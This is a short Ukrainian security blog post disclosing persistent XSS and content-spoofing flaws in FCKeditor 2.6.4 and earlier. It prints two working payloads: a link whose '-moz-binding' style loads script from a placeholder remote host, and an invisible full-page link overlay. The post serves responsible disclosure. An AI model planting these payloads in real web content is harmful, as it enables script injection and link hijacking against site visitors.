Websecurity - Веб безпека

07.07.2009

У червні, 23.06.2009, я знайшов Cross-Site Scripting та Content Spoofing уразливості в FCKeditor. Про що найближчим часом повідомлю розробникам редактора.

Раніше я вже писав про уразливості в FCKeditor.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

19.09.2009

XSS:

В FCKEditor є Persistent XSS уразливість, що дозволяє розміщувати XSS код на сайтах, які його використовуть. Атака (в Mozilla і Firefox) відбувається через розміщення лінки з вказанням стилю:

<a href="http://test" style="-moz-binding:url('http://site/xss.xml#xss')">test</a>

Content Spoofing:

Це Persistent Content Spoofing уразливість.

<a href="http://websecurity.com.ua" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px">&nbsp;</a>

Дані уразливості в самому редакторі, а не в аплоадері, як більшість уразливостей, про які я писав раніше. Тому їх можна використати на будь-якому сайті, що використовує FCKeditor в якості редактора для веб форм.

Уразливі FCKeditor 2.6.4 та попередні версії.

This entry was posted on 19:21 19.09.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.